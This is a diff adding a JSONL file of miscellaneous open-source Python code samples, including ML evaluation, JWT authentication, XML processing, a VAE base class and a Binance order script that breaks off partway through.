diff --git "a/6532.jsonl" "b/6532.jsonl" new file mode 100644--- /dev/null +++ "b/6532.jsonl" @@ -0,0 +1,648 @@ +{"seq_id":"286736334","text":"def factorial(n):\r\n fact = 1\r\n for i in range(2, n+1):\r\n fact *= i\r\n return fact\r\n\r\n\r\ndef main():\r\n cur_nums = []\r\n for i in range(3, 100000):\r\n broken_num = [int(j) for j in str(i)]\r\n sum_fact = sum([factorial(j) for j in broken_num])\r\n if sum_fact == i:\r\n cur_nums.append(i)\r\n print(cur_nums)\r\n print(sum(cur_nums))\r\n\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"PE34.py","file_name":"PE34.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"570900114","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# Author: Gusseppe Bravo \n# License: BSD 3 clause\n\"\"\"\nThis module provides ideas for evaluating some machine learning algorithms.\n\n\"\"\"\nfrom __future__ import print_function\nimport operator\nimport warnings\nimport pickle\n\nimport numpy as np\nimport pandas as pd\n#import matplotlib.pyplot as plt\n# import plotly.plotly as py\nimport plotly.graph_objs as go\nimport cufflinks as cf # Needed\n#sklearn warning\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\n\nfrom collections import OrderedDict\nfrom plotly.offline.offline import _plot_html\n\nfrom sklearn.pipeline import Pipeline, FeatureUnion\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import StratifiedShuffleSplit\nfrom sklearn.model_selection import KFold\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.preprocessing import FunctionTransformer\n\n#Algorithms\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.svm import SVC\nfrom sklearn.neural_network import MLPClassifier\n\n#Ensembles algorithms\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.ensemble import VotingClassifier\n\n\nclass Evaluate():\n \"\"\" A class for resampling and evaluation \"\"\"\n\n\n\n def __init__(self, definer, preparer, selector):\n self.definer = definer\n self.preparer = preparer\n self.selector = selector\n self.plot_html = None\n\n self.report = None\n self.raw_report = None\n self.best_pipelines = None\n self.pipelines = None\n self.X_train = None\n self.y_train = None\n self.X_test = None\n self.y_test = None\n\n self.test_size = 0.2\n self.num_folds = 10\n self.seed = 7\n\n def pipeline(self):\n\n #evaluators = []\n self.build_pipelines()\n self.split_data(self.test_size, self.seed)\n self.evaluate_pipelines()\n self.set_best_pipelines()\n\n #[m() for m in evaluators]\n return self\n\n def set_models(self):\n\n rs = 1\n models = []\n # LDA : Warning(Variables are collinear)\n models.append(('LinearDiscriminantAnalysis', LinearDiscriminantAnalysis()))\n models.append(('SVC', SVC(random_state=rs)))\n models.append(('GaussianNB', GaussianNB()))\n models.append(('MLPClassifier', MLPClassifier()))\n models.append(('KNeighborsClassifier', KNeighborsClassifier()))\n models.append(('DecisionTreeClassifier', 
DecisionTreeClassifier(random_state=rs)))\n models.append(('LogisticRegression', LogisticRegression()))\n\n # Bagging and Boosting\n # models.append(('ExtraTreesClassifier', ExtraTreesClassifier(n_estimators=150)))\n models.append(('ExtraTreesClassifier', ExtraTreesClassifier(random_state=rs)))\n models.append(('AdaBoostClassifier', AdaBoostClassifier(DecisionTreeClassifier(random_state=rs),\n random_state=rs)))\n # models.append(('AdaBoostClassifier', AdaBoostClassifier(DecisionTreeClassifier())))\n models.append(('RandomForestClassifier', RandomForestClassifier(random_state=rs)))\n models.append(('GradientBoostingClassifier',\n GradientBoostingClassifier(random_state=rs)))\n # models.append(('GradientBoostingClassifier', GradientBoostingClassifier()))\n\n # Voting\n estimators = []\n estimators.append((\"Voting_GradientBoostingClassifier\", GradientBoostingClassifier(random_state=rs)))\n estimators.append((\"Voting_ExtraTreesClassifier\", ExtraTreesClassifier(random_state=rs)))\n voting = VotingClassifier(estimators)\n models.append(('VotingClassifier', voting))\n\n return models\n\n def split_data(self, test_size=0.20, seed=7):\n \"\"\" Need to fill \"\"\"\n\n X_train, X_test, y_train, y_test = train_test_split(\n self.definer.X, self.definer.y, test_size=test_size, random_state=seed)\n\n self.X_train = X_train\n self.X_test = X_test\n self.y_train = y_train\n self.y_test = y_test\n\n # return X_train, X_test, y_train, y_test\n\n\n def build_pipelines(self):\n pipelines = []\n models = self.set_models()\n\n for m in models:\n pipelines.append((m[0],\n Pipeline([\n #('preparer', FunctionTransformer(self.preparer)),\n ('preparer', self.preparer),\n ('selector', self.selector),\n m,\n ])\n ))\n\n self.pipelines = pipelines\n\n return pipelines\n\n def evaluate_pipelines(self, ax=None):\n\n test_size = self.test_size\n num_folds = self.num_folds\n seed = self.seed\n scoring = 'accuracy'\n\n #pipelines = self.build_pipelines(self.set_models())\n #pipelines = self.pipelines\n\n\n #self.report = {}\n #report_element = {}\n self.report = [[\"Model\", \"Mean\", \"STD\"]]\n results = []\n names = []\n\n for name, model in self.pipelines:\n print(\"Modeling...\", name)\n\n kfold = KFold(n_splits=num_folds, random_state=seed)\n #cv_results = cross_val_score(model, self.definer.data.ix[:,:-1], self.definer.data.ix[:,-1], cv=kfold, \\\n #scoring=scoring)\n cv_results = cross_val_score(model, self.X_train, self.y_train, cv=kfold, \\\n scoring=scoring)\n\n # save the model to disk\n #filename = name+'.ml'\n #pickle.dump(model, open('./models/'+filename, 'wb'))\n\n #results.append(cv_results)\n mean = cv_results.mean()\n std = cv_results.std()\n\n d = {'name': name, 'values': cv_results, 'mean': round(mean, 3), 'std': round(std, 3)}\n results.append(d)\n #results['result'] = cv_results\n #names.append(name)\n #report_element[name] = {'mean':mean, 'std':std}\n #self.report.update(report_element)\n\n #report_print = \"Model: {}, mean: {}, std: {}\".format(name,\n #mean, std)\n self.report.append([name, round(mean,3), round(std,3)])\n print(\"Score \", mean)\n print(\"---------------------\")\n #print(report_print)\n\n self.raw_report = sorted(results, key=lambda k: k['mean'], reverse=True)\n #print(self.raw_report)\n headers = self.report.pop(0)\n df_report = pd.DataFrame(self.report, columns=headers)\n #print(df_report)\n\n #print(self.report)\n #self.sort_report(self.report)\n self.sort_report(df_report)\n #self.plotModels(results, names)\n\n\n def sort_report(self, report):\n \"\"\"\" Choose the best 
two algorithms\"\"\"\n\n #sorted_t = sorted(report.items(), key=operator.itemgetter(1))\n report.sort_values(['Mean'], ascending=[False], inplace=True)\n #self.bestAlgorithms = sorted_t[-2:]\n self.report = report.copy()\n\n #print(self.report)\n\n def set_best_pipelines(self):\n alg = list(self.report.Model)[0:2]\n best_pipelines = []\n\n for p in self.pipelines:\n if p[0] in alg:\n best_pipelines.append(p)\n\n self.best_pipelines = best_pipelines\n\n #print(self.best_pipelines)\n\n def plot_to_html(self, fig):\n plotly_html_div, plotdivid, width, height = _plot_html(\n figure_or_data=fig,\n config=\"\",\n validate=True,\n default_width='90%',\n default_height=\"100%\",\n global_requirejs=False)\n\n return plotly_html_div\n\n def plot_models(self):\n \"\"\"\" Plot the algorithms by using box plots\"\"\"\n #df = pd.DataFrame.from_dict(self.raw_report)\n #print(df)\n\n results = self.raw_report\n data = []\n N = len(results)\n c = ['hsl('+str(h)+',50%'+',50%)' for h in np.linspace(0, 270, N)]\n\n for i, d in enumerate(results):\n trace = go.Box(\n y=d['values'],\n name=d['name'],\n marker=dict(\n color=c[i],\n ),\n boxmean='sd'\n )\n data.append(trace)\n\n text_scatter = go.Scatter(\n x=[d['name'] for d in results],\n y=[d['mean'] for d in results],\n name='score',\n mode='markers',\n text=['Explanation' for _ in results]\n )\n data.append(text_scatter)\n layout = go.Layout(\n #showlegend=False,\n title='Hover over the bars to see the details',\n annotations=[\n dict(\n x=results[0]['name'],\n y=results[0]['mean'],\n xref='x',\n yref='y',\n text='Best model',\n showarrow=True,\n arrowhead=7,\n ax=0,\n ay=-40\n ),\n dict(\n x=results[-1]['name'],\n y=results[-1]['mean'],\n xref='x',\n yref='y',\n text='Worst model',\n showarrow=True,\n arrowhead=7,\n ax=0,\n ay=-40\n )\n ]\n )\n\n fig = go.Figure(data=data, layout=layout)\n\n self.plot_html = self.plot_to_html(fig)\n return self.plot_html\n\n def save_plot(self, path):\n with open(path, \"w\") as plot:\n plot.write(self.plot_html)\n\n def save_report(self, path):\n # with open(path, \"w\") as plot:\n self.report.to_csv(path, index=False)\n # plot.write(valuate.report.to_csv())\n\n class CustomFeature(TransformerMixin):\n \"\"\" A custome class for modeling \"\"\"\n\n def transform(self, X, **transform_params):\n #X = pd.DataFrame(X)\n return X\n\n def fit(self, X, y=None, **fit_params):\n return self\n","sub_path":"pymach/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":10520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"35766146","text":"from py_hcl.core.expr import HclExpr\nfrom py_hcl.core.type.vector import VectorT\n\n\nclass VecHolder(HclExpr):\n def __init__(self, hcl_type, conn_side, assoc_value):\n self.hcl_type = hcl_type\n self.conn_side = conn_side\n\n assert isinstance(hcl_type, VectorT)\n assert hcl_type.size == len(assoc_value)\n self.assoc_value = assoc_value\n","sub_path":"py_hcl/core/expr/vec_holder.py","file_name":"vec_holder.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"430309593","text":"# Implement atoi which converts a string to an integer.\n#\n# Input: \" -42\"\n# Output: -42\n# Explanation: The first non-whitespace character is '-', which is the minus sign.\n# Then take as many numerical digits as possible, which gets 42.\n\nimport re\nclass Solution:\n # @return an integer\n def myAtoi(self, str):\n str = str.strip(' ') # 
strip the specified characters from both ends of the string\n print(str)\n str = re.findall('(^[\+\-0]*\d+)\D*', str)\n\n try:\n result = int(''.join(str))\n MAX_INT = 2147483647\n MIN_INT = -2147483648\n if result > MAX_INT > 0:\n return MAX_INT\n elif result < MIN_INT < 0:\n return MIN_INT\n else:\n return result\n except:\n return 0\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n test = Solution()\n str = \" dfda 12\" # expected 0\n a = test.myAtoi(str)\n print(a)","sub_path":"python/Day6/atoi.py","file_name":"atoi.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"630543415","text":"import jwt\nfrom core.models import User\nfrom django.conf import settings\nfrom rest_framework import authentication, exceptions\nfrom django.http.response import JsonResponse\nfrom rest_framework import status\n\nclass JWTAuthentication():\n @staticmethod\n def generate_access_token(userId):\n jwt_token = jwt.encode(\n {'id': userId}, settings.JWT_SECRET_KEY,settings.JWT_ALGORITHM)\n access_token = jwt_token.decode('utf-8')\n return access_token\n\n @staticmethod\n def isAdmin(userId):\n isAdmin_ = False\n user_info = User.objects.filter(role__name='admin',id = userId)\n if user_info:\n isAdmin_ = True\n return isAdmin_\n\n @staticmethod\n def validate_token(request):\n access_token = request.headers.get('authorization',None)\n if access_token:\n try:\n payload = jwt.decode(access_token, settings.JWT_SECRET_KEY, settings.JWT_ALGORITHM)\n user = User.objects.get(id = payload.get('id'))\n return user\n\n except jwt.DecodeError as identifier:\n raise exceptions.AuthenticationFailed(\n 'Your token is invalid')\n except jwt.ExpiredSignatureError as identifier:\n raise exceptions.AuthenticationFailed(\n 'Your token is expired')\n else:\n raise exceptions.AuthenticationFailed('Authorization Header missing')","sub_path":"backend/core/authentications.py","file_name":"authentications.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"112740184","text":"import unittest\n\nfrom flask import url_for\n\nfrom config import create_app, db\n\n\nclass APITestCase(unittest.TestCase):\n def setUp(self):\n self.app = create_app('testing')\n self.app_context = self.app.app_context()\n self.app_context.push()\n db.create_all()\n self.client = self.app.test_client()\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n self.app_context.pop()\n\n def get_api_headers(self):\n return {\n 'Accept': 'application/json',\n 'Content-Type': 'application/json'\n }\n\n def test_user_path(self):\n response = self.client.get('/user')\n self.assertEqual(response.json['code'], 10200)\n\n def test_status_path(self):\n response = self.client.get('/status/')\n self.assertEqual(response.json['code'], 10200)\n ","sub_path":"tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"157422616","text":"DEFAULT_IP_ADDRESS = '127.0.0.1'\nDEFAULT_PORT = 7777\nMAX_CONNECTIONS = 3\nENCODING = 'utf-8'\nMAX_PACKAGE_LENGTH = 1024\n\n# JIM fields\nACTION = 'action'\nTIME = 'time'\nUSER = 'user'\nACCOUNT_NAME = 'account_name'\nRESPONSE = 'response'\nERROR = 'error'\nALERT = 'alert' # error message text\nROOM = 'room' # chat\n\n# action values\nPRESENCE = 'presence' # when a client connects to the server\nPROBE = 'probe' # user online availability\nQUIT = 'quit' # 
exit\nAUTHENTICATE = 'authenticate' # authorization\nMESSAGE = 'msg'\nJOIN = 'join' # join a chat\nLEAVE = 'leave' # leave a chat\n\n# code\nBASIC_NOTICE = 100\nOK = 200\nCREATED = 201 # object created\nACCEPTED = 202 # confirmation\nSERVER_ERROR = 500\nWRONG_REQUEST = 400 # bad request\n\n","sub_path":"HW_3_Afanaseva_Maria/common/variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"612346873","text":"from flask import Flask\n\nimport kangce.user\nimport kangce.schema\n\napp = Flask(__name__)\n\n# Make the WSGI interface available at the top level so wfastcgi can get it.\nwsgi_app = app.wsgi_app\n\nisdebug = True\n\nbaseUri = \"http://dev.7csc.com\"\npvBaseUri = \"{}/pv\".format(baseUri)\ncompanyId = \"95f05fe5621f4f299771759758ab7fb0\"\n\n@app.route('/icsr/schema')\ndef get_schema(baseUri):\n login_response = kangce.user.login(baseUri, isdebug)\n kangce.schema.clean_redis(pvBaseUri, login_response, companyId)\n kangce.schema.get_schema(pvBaseUri, login_response)\n kangce.schema.get_schema4add(pvBaseUri, login_response)\n\n\nif __name__ == \"__main__\":\n if isdebug:\n baseUri = \"http://127.0.0.1:8082\"\n pvBaseUri = \"{}\".format(baseUri)\n get_schema(baseUri)","sub_path":"mickeyFlask/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"483099977","text":"from app.classification_module.prepare_ratio import get_model_ratio\r\nfrom app.classification_module.numpy_proceed import preprocess_array\r\nfrom app.doc2vec_module.train_model import get_model_for_genre\r\nfrom app.doc2vec_module.constants import FileConstants\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom gensim.models import Doc2Vec\r\nfrom app.doc2vec_module import load\r\nfrom pathlib import Path\r\nimport numpy as np\r\n\r\n\r\n# Example run for individual books\r\nclf = MLPClassifier(solver='lbfgs', alpha=1e-5,\r\n hidden_layer_sizes=(15, 6), random_state=1)\r\n\r\n\r\n#path_to_check1 = Path(__file__).parents[1].joinpath('books/test_book/Дети Капитана Гранта.txt')\r\n#documents1 = load.get_doc_from_file(str(path_to_check1))\r\n\r\npath_to_check1 = Path(__file__).parents[1].joinpath('books/test_book/Гарри Поттер и Дары Смерти.txt')\r\ndocuments1 = load.get_doc_from_file(str(path_to_check1))\r\n\r\nprint(\"Building the model for the book\")\r\nprint(\"\")\r\ncheck_model1 = get_model_for_genre([documents1])\r\n#check_model2 = get_model_for_genre([documents2])\r\n\r\nprint(\"Loading the per-genre models\")\r\nprint(\" \")\r\n\r\nprop_list = [\"MODEL_ADVENTURE\", \"MODEL_ART\", \"MODEL_DETECTIVE\", \"MODEL_FANTASTIC\", \"MODEL_FANTASY\", \"MODEL_LOVE\"]\r\ngenre_labels = ['adventure', 'art', 'detective', 'science fiction', 'fantasy', 'love']\r\ntrain_list = []\r\n\r\nfor item in prop_list:\r\n print(\"Model: {0}\".format(item))\r\n model_prop = getattr(FileConstants, item)\r\n model = Doc2Vec.load(model_prop.fget(FileConstants()))\r\n train = preprocess_array(get_model_ratio(model))\r\n train_list.append(train)\r\n print(\" \")\r\n\r\ncheck_train1 = preprocess_array(np.array(check_model1.docvecs[str(0)]))\r\nnp_train_list = np.asarray(train_list)\r\n\r\ncounter = 0\r\ncounter1 = 0\r\n\r\nlabels = []\r\n\r\nfor i in range(1, 7):\r\n a = np.empty(6)\r\n a.fill(i)\r\n labels.append(a)\r\n\r\nlabels = 
np.asarray(labels)\r\nprint(np_train_list)\r\nprint(\"======================\")\r\nprint(labels)\r\n\r\nclf.fit(np_train_list, [1, 2, 3, 4, 5, 6])\r\n\r\ntest = []\r\n\r\nfor i in range(6):\r\n test.append(np.random.randint(200, size = 20))\r\n\r\ntest = np.asarray(test)\r\n\r\nfor i in range(6):\r\n print(\"Computing for genre \\\"{0}\\\"\".format(genre_labels[counter]))\r\n check = test.copy()\r\n check[counter] = check_train1\r\n print(clf.predict(check))\r\n\r\n counter +=1\r\n","sub_path":"app/classification_module/classificate.py","file_name":"classificate.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"441329949","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport numpy as np\nfrom helpers import test_clfs, load_data,get_baseline, print_results, _naive_predictor\n\ndef get_predictor_of_wrong_predictions(clf):\n target_name = \"wrong_pred\" \n naive_predictor, df = _naive_predictor()\n \n df['B365_pred']=naive_predictor\n df[target_name]=df['FTR']!=df['B365_pred']\n df.drop(inplace=True,labels=['FTR'],axis=1)\n \n target=df[target_name]\n df = pd.get_dummies(df)\n X=df.drop(target_name,axis=1)\n df.head()\n res=test_clfs(clfs=[clf],X=X,target=target,cv=10)\n \n models =[]\n for k in res.keys():\n models.append(k)\n return models[0], X, target\n\n \ndef get_predictor_on_wrong(clf):\n target_name = \"FTR\"\n naive_predictor, df = _naive_predictor() \n \n df['B365_pred']=naive_predictor\n df_incorrect=df[df['FTR']!=df['B365_pred']]\n # df_incorrect.drop(inplace=True,labels=['HomeTeam', 'AwayTeam', 'FTHG', 'FTAG', 'HTHG', 'HTAG', 'HTR', 'Referee', 'HS', \n # 'AS', 'HST', 'AST', 'HF', 'AF', 'HC', 'AC', 'HY', 'AY', 'HR', 'AR', 'B365H', 'B365D', 'B365A', 'BWH', 'BWD', 'BWA', 'IWH', \n # 'IWD', 'IWA', 'LBH', 'LBD', 'LBA', 'PSH', 'PSD', 'PSA', 'WHH', 'WHD', 'WHA', 'VCH', 'VCD', 'VCA', 'Bb1X2', 'BbMxH', 'BbAvH', \n # 'BbMxD', 'BbAvD', 'BbMxA', 'BbAvA', 'BbOU', 'BbMx>2.5', 'BbAv>2.5', 'BbMx<2.5', 'BbAv<2.5', 'BbAH', 'BbAHh', 'BbMxAHH', \n # 'BbAvAHH', 'BbMxAHA', 'BbAvAHA', 'PSCH', 'PSCD', 'PSCA',\n # 'home_team_goals_for', 'home_team_goals_against', \n # 'home_team_corners_for', 'home_team_corners_against', 'home_team_shotson_for', 'home_team_shotson_against', \n # 'home_team_shotsoff_for', 'home_team_shotsoff_against', 'away_team_goals_for', 'away_team_goals_against', \n # 'away_team_corners_for', 'away_team_corners_against', 'away_team_shotson_for', 'away_team_shotson_against', \n # 'away_team_shotsoff_for', 'away_team_shotsoff_against'],axis=1)\n\n target=df_incorrect[target_name]\n \n df_incorrect=df_incorrect.drop(labels=target_name,axis=1)\n X = pd.get_dummies(df_incorrect)\n\n res=test_clfs(clfs=[clf],X=X,target=target,cv=10)\n \n models =[]\n for k in res.keys():\n models.append(k)\n return models[0], X, target","sub_path":"DataScience/DataAnalysisFootball/stacked_models_helper.py","file_name":"stacked_models_helper.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"220834371","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/7/7 16:18\n# @Author : FrankLiu\n# @Contact : liufft98@gmail.com\n# @File : xmv_to_csv.py\n# @Software: PyCharm\n\n\nimport os\nimport glob\nimport pandas as pd\nimport xml.etree.ElementTree as ET\n\nos.chdir('D:\\\\Tensorflow\\\\models\\\\research\\\\object_detection\\\\catdog\\\\test')\npath = 
'D:\\\\Tensorflow\\\\models\\\\research\\\\object_detection\\\\catdog\\\\test'\n\n\ndef xml_to_csv(path):\n xml_list = []\n for xml_file in glob.glob(path + '/*.xml'):\n tree = ET.parse(xml_file)\n root = tree.getroot()\n for member in root.findall('object'):\n value = (root.find('filename').text,\n int(root.find('size')[0].text),\n int(root.find('size')[1].text),\n member[0].text,\n int(member[4][0].text),\n int(member[4][1].text),\n int(member[4][2].text),\n int(member[4][3].text),\n )\n xml_list.append(value)\n column_name = ['filename','width','height','class','xmin','ymin','xmax','ymax']\n xml_df = pd.DataFrame(xml_list,columns=column_name)\n # print(xml_df)\n return xml_df\n\ndef main():\n image_path = path\n xml_df = xml_to_csv(image_path)\n xml_df.to_csv('catdog_test.csv',index=None)\n print(\"conversion succeeded!\")\n\n\nmain()\n","sub_path":"xmv_to_csv.py","file_name":"xmv_to_csv.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"570125869","text":"#!/usr/bin/env python\n\n'''Create and print a new XML document'''\n\nHAS_LXML = False\n\ntry:\n import lxml.etree as ET\n HAS_LXML = True\nexcept ImportError:\n import xml.etree.ElementTree as ET\n \ndef main():\n '''Program entry point'''\n root = build_tree()\n doc = ET.ElementTree(root)\n print_doc(root)\n write_doc(doc)\n\ndef build_tree():\n '''Build the new XML document'''\n root = ET.Element('movies')\n \n for movie in ('Superman Returns', 'This is Spinal Tap'):\n movie_element = ET.Element('movie')\n movie_element.text = movie\n root.append(movie_element)\n \n movie = ET.Element('movie', director='Spielberg, Stephen')\n root.append(movie)\n movie.text = 'Jaws'\n \n movie = ET.Element('movie', director='Hitchcock, Alfred')\n movie.text = 'Vertigo'\n actor1 = ET.Element('actor')\n actor1.text = 'James Stewart'\n movie.append(actor1)\n actor2 = ET.Element('actor')\n actor2.text = 'Kim Novak'\n movie.append(actor2)\n root.append(movie)\n \n movie3 = ET.Element('movie', director='Welles, Orson')\n movie3.text = 'Citizen Kane'\n root.append(movie3)\n\n return root\n\ndef print_doc(root):\n '''Print out the XML document, pretty-printing if available'''\n if HAS_LXML:\n print(ET.tostring(root, pretty_print=True).decode())\n else:\n print(ET.tostring(root).decode())\n\ndef write_doc(doc):\n '''Write the XML document out to a file, pretty-printing if available'''\n if HAS_LXML:\n doc.write('movies.xml', pretty_print=True)\n else:\n doc.write('movies.xml')\n\nmain()\n","sub_path":"EXAMPLES/xml_create_movies.py","file_name":"xml_create_movies.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"106346018","text":"from typing import Dict, Optional, Tuple\n\nimport torch\nfrom torch import Tensor, nn\nfrom torch.nn import functional as F\n\n\nclass BaseSequentialVAE(nn.Module):\n \"\"\"Base class for sequential model.\"\"\"\n\n def forward(self, x: Tensor, time_steps: int = 0) -> Tensor:\n \"\"\"Forwards to reconstruct given data.\n\n Args:\n x (torch.Tensor): Observation tensor, size `(b, l, c, h, w)`.\n time_steps (int, optional): Time step for prediction.\n\n Returns:\n recon (torch.Tensor): Reconstructed observations.\n \"\"\"\n\n recon, *_ = self.sample(x, time_steps)\n\n return recon\n\n def loss_func(\n self, x: Tensor, mask: Optional[Tensor] = None, beta: float = 1.0\n ) -> Dict[str, Tensor]:\n \"\"\"Loss function.\n\n Args:\n x (torch.Tensor): 
Observation tensor, size `(b, l, c, h, w)`.\n mask (torch.Tensor, optional): Sequence mask for valid data with binary values, size\n `(b, l)`.\n beta (float, optional): Beta coefficient of KL term.\n\n Returns:\n loss_dict (dict of [str, torch.Tensor]): Dict of losses.\n \"\"\"\n\n raise NotImplementedError\n\n def sample(\n self, x: Optional[Tensor] = None, time_steps: int = 0, batch_size: int = 1\n ) -> Tuple[Tensor, ...]:\n \"\"\"Reconstructs and samples observations.\n\n Args:\n x (torch.Tensor, optional): Observation tensor, size `(b, l, c, h, w)`.\n time_steps (int, optional): Time step for prediction.\n batch_size (int, optional): Batch size for sampling, used if `x` is `None`.\n\n Returns:\n samples (tuple of torch.Tensor): Tuple of reconstructed or sampled data. The first\n element should be reconstructed observations.\n\n Raises:\n ValueError: If `x` is `None` and `time_steps` is non-positive.\n \"\"\"\n\n raise NotImplementedError\n\n\ndef kl_divergence_normal(\n mu0: Tensor, var0: Tensor, mu1: Tensor, var1: Tensor, reduce: bool = True\n) -> Tensor:\n \"\"\"Kullback Leibler divergence for 1-D Normal distributions.\n\n p = N(mu0, var0)\n q = N(mu1, var1)\n KL(p||q) = 1/2 * (var0/var1 + (mu1-mu0)^2/var1 - 1 + log(var1/var0))\n\n Args:\n mu0 (torch.Tensor): Mean vector of p.\n var0 (torch.Tensor): Diagonal variance of p.\n mu1 (torch.Tensor): Mean vector of q.\n var1 (torch.Tensor): Diagonal variance of q.\n reduce (bool, optional): If `True`, sum calculated loss for each data point.\n\n Returns:\n kl (torch.Tensor): Calculated kl divergence for each data point.\n \"\"\"\n\n diff = mu1 - mu0\n kl = (var0 / var1 + diff ** 2 / var1 - 1 + (var1 / var0).log()) * 0.5\n\n if reduce:\n return kl.sum(-1)\n return kl\n\n\ndef nll_bernoulli(x: Tensor, probs: Tensor, reduce: bool = True) -> Tensor:\n \"\"\"Negative log likelihood for Bernoulli distribution.\n\n Ref)\n https://pytorch.org/docs/stable/_modules/torch/distributions/bernoulli.html#Bernoulli\n https://github.com/pytorch/pytorch/blob/master/torch/distributions/utils.py#L75\n\n Args:\n x (torch.Tensor): Inputs tensor, size `(*, dim)`.\n probs (torch.Tensor): Probability parameter, size `(*, dim)`.\n reduce (bool, optional): If `True`, sum calculated loss for each data point.\n\n Returns:\n nll (torch.Tensor): Calculated nll for each data point, size `(*,)` if `reduce` is `True`,\n `(*, dim)` otherwise.\n \"\"\"\n\n probs = probs.clamp(min=1e-6, max=1 - 1e-6)\n logits = torch.log(probs) - torch.log1p(-probs)\n nll = F.binary_cross_entropy_with_logits(logits, x, reduction=\"none\")\n\n if reduce:\n return nll.sum(-1)\n return nll\n","sub_path":"seqlib/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"347936132","text":"# CLASS METHOD EXAMPLES\n# GET NO OF OBJECTS CREATED FOR A CLASS\n\nclass Test:\n count = 0 # Static Variable\n def __init__(self):\n Test.count = Test.count + 1 # To access static variable inside constructor\n @classmethod\n def getNoOfObjects(cls):\n print('NO OF OBJS FOR GIVEN CLASS :',cls.count) # Test.count\n\nTest.getNoOfObjects() # 0\nt1 = Test() # Obj Created, Constructor executed automatically\nt2 = Test() # Obj Created, Constructor executed automatically\nt2 = Test()\nt2 = Test()\nTest.getNoOfObjects() # 4\n\n 
\n\n","sub_path":"02-OOPs/25-noOfObjects.py","file_name":"25-noOfObjects.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"469562761","text":"#!/usr/bin/env python3\n\nimport math \nimport click\nfrom client import get_client\nfrom binance.exceptions import BinanceAPIException, BinanceOrderException \n\nclient = get_client() \n\n@click.command() \n@click.argument('side') \n@click.argument('order_type') \n@click.argument('symbol') \n@click.option('--test','-t', default=False, is_flag=True) \n@click.option('--percentage', '-p', default=1, type=float) \n@click.option('--mrk_per', '-m', default=0, type=float) \n\ndef make_order(side, order_type, symbol, test, percentage, mrk_per):\n \n if symbol.endswith('USDT'): \n asset = symbol[:-4]\n base = 'USDT' \n else: # BTC or BNB \n asset = symbol[:-3]\n base = symbol[-3:]\n \n asset_balance = client.get_asset_balance(asset=asset) \n base_balance = client.get_asset_balance(asset=base) \n current_price = client.get_symbol_ticker(symbol=symbol)\n \n print(asset_balance) \n print(base_balance) \n print(current_price)\n \n price = float(current_price['price']) * ( 1 + float(mrk_per) ) \n \n if side=='BUY':\n quantity = float(base_balance['free']) * float(percentage)/float(price)*0.9995\n else:\n quantity = float(asset_balance['free']) * float(percentage)*0.9995 \n \n filters = client.get_symbol_info(symbol)['filters']\n tick_size = float( list(filter(lambda dum: dum['filterType'] == 'PRICE_FILTER', filters))[0]['tickSize'] )\n step_size = float( list(filter(lambda dum: dum['filterType'] == 'LOT_SIZE', filters))[0]['stepSize'] )\n \n def float_precision(f, n): \n n = int(math.log10(1 / float(n)))\n f = math.floor(float(f) * 10 ** n) / 10 ** n\n f = \"{:0.0{}f}\".format(float(f), n)\n return str(int(f)) if int(n) == 0 else f\n \n quantity = float( float_precision(quantity, step_size) ) \n price = float_precision(price, tick_size) \n \n try:\n if test: \n print('test order:', side, order_type, 'symbol', symbol, 'price', price, 'quantity', quantity, 'cost', float(price)*quantity) \n if order_type == 'MARKET': \n client.create_test_order(symbol=symbol, side=side, type=order_type, quantity=quantity) \n \n elif 